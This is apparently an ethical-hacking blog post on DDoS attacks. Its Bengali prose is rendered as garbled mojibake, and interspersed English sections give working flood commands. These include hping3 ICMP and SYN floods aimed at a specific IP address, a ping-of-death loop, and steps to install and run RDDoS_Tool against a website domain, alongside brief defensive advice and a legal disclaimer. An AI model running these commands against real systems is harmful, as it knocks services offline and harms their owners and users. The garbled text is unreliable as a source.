DDoS (āĻĄāĻŋāĻĄāĻ¸) āĻāĻžāĻā§ āĻŦāĻ˛ā§?
āĻĄāĻŋāĻ¸ā§āĻā§āĻ°āĻŋāĻŦāĻŋāĻāĻā§āĻĄ āĻĄāĻŋāĻ¨āĻžāĻ¯āĻŧā§āĻ˛ āĻ
āĻĢ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻŦāĻž āĻĄāĻŋāĻĄāĻ¸ āĻšāĻ˛ā§ āĻŽāĻžāĻ˛ā§āĻāĻŋāĻĒāĻ˛ āĻĄāĻŋāĻāĻžāĻāĻ¸ āĻāĻāĻ āĻāĻ°ā§ āĻāĻāĻāĻŋ āĻ¸ā§āĻŽ āĻāĻžāĻ°ā§āĻā§āĻā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻāĻ°āĻžāĨ¤ āĻĄāĻ¸ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻ¯ā§āĻāĻžāĻ¨ā§ āĻāĻāĻāĻŋ āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻāĻāĻ āĻāĻ°ā§ āĻāĻ°āĻž āĻšāĻ¯āĻŧ āĻāĻŋāĻāĻŦāĻž āĻāĻāĻāĻ¨ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻāĻžāĻāĻāĻŋ āĻāĻ°ā§, āĻ¸ā§āĻāĻžāĻ¨ā§ āĻĄāĻŋāĻĄāĻ¸ āĻ
ā§āĻ¯āĻžāĻāĻžāĻā§ āĻ
āĻ¨ā§āĻāĻā§āĻ˛ā§ āĻĄāĻŋāĻāĻžāĻāĻ¸ āĻāĻāĻ āĻāĻ°āĻž āĻšāĻ¯āĻŧ, āĻŦāĻž āĻāĻ¯āĻŧā§āĻāĻāĻ¨ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻŽāĻŋāĻ˛ā§ āĻāĻžāĻāĻāĻž āĻāĻ°ā§āĨ¤
āĻ§āĻ°ā§āĻ¨ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻāĻāĻŋ Business āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ āĻāĻā§āĨ¤ āĻ¸ā§āĻāĻžāĻ¨ā§ āĻāĻĒāĻ¨āĻŋ āĻŦāĻŋāĻāĻŋāĻ¨ā§āĻ¨ āĻĒāĻŖā§āĻ¯/āĻ¸ā§āĻŦāĻž āĻŦāĻŋāĻā§āĻ°āĻŋ āĻāĻ°ā§āĻ¨ āĻāĻŦāĻ āĻ
āĻ¨ā§āĻ āĻāĻžāĻ¸ā§āĻāĻŽāĻžāĻ° āĻāĻĒāĻ¨āĻžāĻ° āĻāĻ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻāĻāĻ āĻāĻ°ā§āĨ¤ āĻ āĻāĻžāĻ°āĻ¨ā§ āĻāĻā§āĻ¤ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻĒāĻ¨āĻŋ āĻ
āĻ¨ā§āĻ āĻŦā§āĻļāĻŋ āĻ¸ā§āĻĒā§āĻ¸ āĻāĻŦāĻ āĻŦā§āĻ¯āĻžāĻ¨ā§āĻĄāĻāĻāĻĨ āĻ¸āĻš āĻšā§āĻ¸ā§āĻāĻŋāĻ āĻāĻŋāĻ¨āĻ˛ā§āĻ¨āĨ¤ āĻā§āĻ¨ āĻāĻžāĻ°āĻ¨ā§ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ āĻā§āĻ¨ āĻšā§āĻ¯āĻžāĻāĻžāĻ°ā§āĻ° āĻāĻžāĻ°āĻžāĻĒ āĻ¨āĻāĻ°ā§ āĻāĻ˛ā§āĨ¤ āĻ¸ā§ āĻ¯āĻĻāĻŋ āĻāĻĒāĻ¨āĻžāĻ° āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻ āĻ¸ā§āĻ˛ā§ āĻŦāĻž āĻ
āĻĢāĻ˛āĻžāĻāĻ¨ āĻāĻ°ā§ āĻĻāĻŋāĻ¤ā§ āĻāĻžāĻ¯āĻŧ āĻ¤āĻžāĻšāĻ˛ā§ āĻ¤āĻžāĻā§ āĻĄāĻŋāĻĄāĻ¸ āĻ
ā§āĻ¯āĻžāĻāĻžāĻā§āĻ° āĻ¸āĻžāĻšāĻžāĻ¯ā§āĻ¯ āĻ¨āĻŋāĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻāĻ° āĻāĻāĻžāĻŦā§ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻāĻāĻŋāĻ° āĻŦā§āĻ¯āĻžāĻ¨ā§āĻĄāĻāĻāĻĨ āĻ¨āĻˇā§āĻ āĻāĻ°ā§ āĻĻāĻŋāĻ¯āĻŧā§ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻāĻāĻŋāĻā§ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ° āĻĨā§āĻā§ āĻŦāĻŋāĻā§āĻāĻŋāĻ¨ā§āĻ¨ āĻāĻ°ā§ āĻĢā§āĻ˛ā§ āĻāĻŦāĻ āĻā§āĻ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻāĻāĻŋāĻ¤ā§ āĻāĻ° āĻāĻŋāĻāĻŋāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĻ¨āĻžāĨ¤
BotNet/ āĻŦāĻāĻ¨ā§āĻ â āĻāĻŽā§āĻŦāĻŋ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻâ?
āĻāĻāĻž āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻšā§āĻ¯āĻžāĻāĻžāĻ°āĻ°āĻž āĻŦāĻāĻ¨ā§āĻ āĻŦāĻž āĻāĻŽā§āĻŦāĻŋ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°ā§, āĻ¯āĻžāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§ āĻ¸āĻšāĻā§āĻ āĻāĻāĻāĻŋ āĻ¸āĻžāĻ°ā§āĻāĻžāĻ°ā§ āĻ
āĻ¨ā§āĻ āĻ¸āĻāĻā§āĻ¯āĻ āĻ°āĻŋāĻā§āĻ¯āĻŧā§āĻ¸ā§āĻ āĻĒāĻžāĻ āĻžāĻ¨ā§ āĻ¯āĻžāĻ¯āĻŧ, āĻāĻŽāĻŋ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻ āĻāĻāĻāĻŋ Infected āĻŽā§āĻ¯āĻžāĻ˛āĻāĻ¯āĻŧā§āĻ¯āĻžāĻ°āĨ¤ āĻŦāĻāĻ¨ā§āĻ āĻāĻ¨āĻĢāĻŋāĻāĻžāĻ°ā§āĻļāĻ¨ā§āĻ° āĻāĻžāĻ°āĻ¨ā§ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻ°āĻŋāĻŽā§āĻāĻ˛āĻŋ āĻāĻžāĻ°ā§āĻā§āĻ āĻ¸ā§āĻ āĻāĻ°ā§ āĻāĻā§āĻ¤ āĻĄāĻŋāĻāĻžāĻāĻ¸āĻā§ āĻāĻ°ā§āĻŽāĻŋ āĻšāĻŋāĻ¸ā§āĻŦā§ āĻāĻāĻ āĻāĻ°āĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤
āĻ¤āĻŦā§, āĻ¸āĻŋāĻā§āĻā§āĻ˛ āĻ
ā§āĻ¯āĻžāĻāĻžāĻā§āĻ° āĻĨā§āĻā§ āĻŦāĻāĻ¨ā§āĻ āĻāĻāĻ āĻāĻ°ā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĒāĻ°āĻŋāĻāĻžāĻ˛āĻ¨āĻž āĻāĻ°āĻ˛ā§ āĻāĻāĻ āĻ¸āĻžāĻĨā§ āĻāĻŋāĻāĻžāĻŦāĻžāĻāĻ āĻĨā§āĻā§ āĻā§āĻ°āĻžāĻŦāĻžāĻāĻ āĻāĻ¨ā§āĻāĻžāĻ°āĻ¨ā§āĻ āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻ¸ā§āĻ¨ā§āĻĄ āĻāĻ°āĻž āĻ¸āĻŽā§āĻāĻŦ, āĻ¯āĻž āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻā§āĻ° āĻ¸āĻŽāĻ¸ā§āĻ¤ āĻŦā§āĻ¯āĻžāĻ¨ā§āĻĄāĻāĻāĻĨ āĻā§ āĻ¨āĻˇā§āĻ āĻāĻ°ā§ āĻĻāĻŋāĻ¤ā§ āĻĒāĻžāĻ°ā§āĨ¤ āĻāĻ§āĻ°āĻŖā§āĻ° āĻļāĻā§āĻ¤āĻŋāĻļāĻžāĻ˛ā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻšāĻ¤ āĻāĻ°āĻžāĻ āĻ
āĻ¨ā§āĻ āĻāĻˇā§āĻāĻāĻ° āĻāĻŦāĻ āĻŦā§āĻ¯āĻžāĻ¯āĻŧāĻŦāĻšā§āĻ˛ āĻšāĻ¯āĻŧā§ āĻĨāĻžāĻā§āĨ¤ āĻŦāĻ āĻ¨ā§āĻ āĻĻāĻŋāĻ¯āĻŧā§ āĻ¸āĻŽāĻžāĻ/ āĻ°āĻžāĻˇā§āĻā§āĻ° āĻŦāĻŋāĻ°ā§āĻ§ā§ āĻāĻ¯āĻŧā§āĻŦāĻ¸āĻžāĻāĻāĻā§āĻ˛ā§ āĻ¸āĻšāĻā§ āĻ§ā§āĻŦāĻāĻ¸ āĻāĻ°āĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤
Before Attack Check Server Response Time
let’s check server response time : kali(cmd) ping www.minhazulasif.me
DDOS Ping ICMP FLOOD – Attck a Server USing hPing3
sudo hping3 -1 –flood 148.163.80.131
Try overwhelmed the server with multiple request and see the server response time
DDOS SYN FLOOD ATTACK
– Using TCP we connect with a server (say port is 80)
sudo hping3 -d 200 –flood 148.163.80.131
– d = packet (byte) –flood = huge request, p = port
Ping Of Death
> nslookup www.targetdomain.com
> get the ip address
> ping ip -t -n 10000 -w 1
Terms:
-t = Pings the specified host until stopped.
-l = buffer size
-n = Count Number of echo requests
-w 1 = wait of second for each reply
DDos Attack In Kali (RDDoS_Tool)
Github Link: https://github.com/Red-company/RDDoS_Tool
apt-get update -y
apt-get install git
git clone https://github.com/Red-company/RDDoS_Tool.git
cd RDDoS_Tool
bash setup.sh
python3 RDDoS_Tool.py
If there are troubles :
pip install tqdm
pip install pyfiglet
Then choose 1 for website attack & put the domain name
āĻāĻŋāĻāĻžāĻŦā§ āĻĄāĻ¸ āĻŦāĻž āĻĄāĻŋāĻĄāĻ¸ āĻ ā§āĻ¯āĻžāĻāĻžāĻ āĻĨā§āĻā§ āĻ¸ā§āĻ°āĻā§āĻˇāĻŋāĻ¤ āĻĨāĻžāĻāĻž āĻ¯āĻžāĻ¯āĻŧ?
āĻĄāĻŋāĻĄāĻ¸ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĨā§āĻā§ āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻĒā§āĻ¤ā§ āĻ
āĻ¨ā§āĻ āĻā§āĻ˛ā§ āĻĒā§āĻāĻĄ āĻāĻŦāĻ āĻ¸ā§āĻā§āĻ°āĻ āĻĢāĻžāĻ¯āĻŧāĻžāĻ°āĻāĻ¯āĻŧāĻžāĻ˛ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻ¤ā§ āĻšāĻŦā§āĨ¤ āĻā§āĻ āĻāĻŦāĻ āĻŽāĻžāĻāĻžāĻ°ā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻšāĻ¤ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻĢāĻžāĻ¯āĻŧāĻžāĻ°āĻāĻ¯āĻŧāĻžāĻ˛ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻ
āĻ¨ā§āĻ āĻāĻžāĻ°ā§āĻ¯āĻāĻ°āĨ¤
āĻĢāĻžāĻ¯āĻŧāĻžāĻ°āĻāĻ¯āĻŧāĻžāĻ˛ āĻāĻ° āĻŽāĻžāĻ§ā§āĻ¯āĻŽā§, āĻ¸āĻŋāĻ¸ā§āĻā§āĻŽ āĻĨā§āĻā§ āĻ
āĻ¤āĻŋāĻ°āĻŋāĻā§āĻ¤ āĻ°āĻŋāĻā§āĻ¯āĻŧā§āĻ¸ā§āĻ āĻŦāĻž āĻā§āĻ°ā§āĻ¯āĻžāĻĢāĻŋāĻ āĻāĻ¸āĻ¤ā§āĻā§ āĻ¤āĻž āĻ¸āĻšāĻā§āĻ āĻŦā§āĻ° āĻāĻ°āĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻāĻā§āĻ¤ āĻāĻāĻĒāĻŋ āĻŦā§āĻ˛āĻ āĻāĻ°ā§ āĻĻāĻŋāĻ˛ā§āĻ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻŦāĻ¨ā§āĻ§ āĻšāĻ¯āĻŧā§ āĻ¯āĻžāĻ¯āĻŧāĨ¤ āĻāĻ° āĻ
āĻ¨ā§āĻāĻā§āĻ˛ā§ āĻšā§āĻ¯āĻžāĻāĻžāĻ° āĻ¯āĻāĻ¨ āĻ¨āĻŋāĻ°ā§āĻĻāĻŋāĻˇā§āĻ āĻāĻāĻāĻŋ āĻ¨ā§āĻāĻāĻ¯āĻŧāĻžāĻ°ā§āĻā§ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻāĻ°ā§ āĻ¤āĻāĻ¨ āĻ¸ā§āĻ āĻšā§āĻ¯āĻžāĻāĻžāĻ°āĻĻā§āĻ° āĻ˛ā§āĻā§āĻļāĻ¨ āĻŦāĻž āĻāĻžāĻ¨ā§āĻā§āĻ°āĻŋ āĻŦā§āĻ˛āĻ āĻāĻ°ā§ āĻĻāĻŋāĻ˛ā§ āĻāĻ āĻ§āĻ°āĻ¨ā§āĻ° āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĨā§āĻā§ āĻ¸ā§āĻ°āĻā§āĻˇāĻŋāĻ¤ āĻĨāĻžāĻāĻž āĻ¯āĻžāĻ¯āĻŧāĨ¤
āĻāĻāĻžāĻĄāĻŧāĻž āĻŦāĻĄāĻŧ āĻ§āĻ°āĻ¨ā§āĻ° āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĒā§āĻ°āĻ¤āĻŋāĻšāĻ¤ āĻāĻ°āĻžāĻ° āĻāĻ¨ā§āĻ¯ āĻā§āĻ˛āĻžāĻāĻĄ āĻ¨āĻŋāĻ°ā§āĻāĻ° āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻ¯ā§āĻŽāĻ¨ Cloudflare, Sucuri firewall, AWS Shield, Project Shield, Wordfence āĻāĻ¤ā§āĻ¯āĻžāĻĻāĻŋ āĻ
āĻ¨ā§āĻ āĻāĻžāĻ˛ā§ āĻāĻžāĻ āĻāĻ°ā§āĨ¤ āĻ¸ā§āĻ¤āĻ°āĻžāĻ āĻĄāĻŋāĻĄāĻ¸ āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻĨā§āĻā§ āĻāĻĒāĻ¨āĻžāĻ° āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸āĻā§ āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻĻāĻŋāĻ¤ā§ āĻāĻžāĻāĻ˛ā§ āĻāĻ¸āĻŦ āĻ¸āĻžāĻ°ā§āĻāĻŋāĻ¸ āĻ
āĻŦāĻļā§āĻ¯āĻ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦā§āĻ¨āĨ¤
DDoS āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻ
āĻŦāĻļā§āĻ¯ āĻāĻāĻāĻŋ āĻļāĻžāĻ¸ā§āĻ¤āĻŋāĻ¯ā§āĻā§āĻ¯ āĻ
āĻĒāĻ°āĻžāĻ§, āĻāĻŽāĻ°āĻž āĻ¸āĻŦāĻžāĻ DDoS āĻ
ā§āĻ¯āĻžāĻāĻžāĻ āĻ¸āĻŽā§āĻĒāĻ°ā§āĻā§ āĻāĻžāĻ¨āĻŦā§ āĻāĻŦāĻ āĻ¨āĻŋāĻā§āĻĻā§āĻ° āĻ¸ā§āĻ°āĻā§āĻˇāĻž āĻ¨āĻŋāĻļā§āĻāĻŋāĻ¤ āĻāĻ°āĻŦā§āĨ¤ āĻāĻžāĻ°ā§ āĻā§āĻˇāĻ¤āĻŋāĻ° āĻāĻ¨ā§āĻ¯ āĻāĻāĻŋ āĻŦā§āĻ¯āĻŦāĻšāĻžāĻ° āĻāĻ°āĻŦ āĻ¨āĻžāĨ¤
Check Firewall/ WAF exist in a site or not
in kali > wafw00f
> wafw00f -l (To see the waf list)
> wafw00f minhazulasif.me (To check filewall exist or not)
Read more bloghs on ethical hacking from here.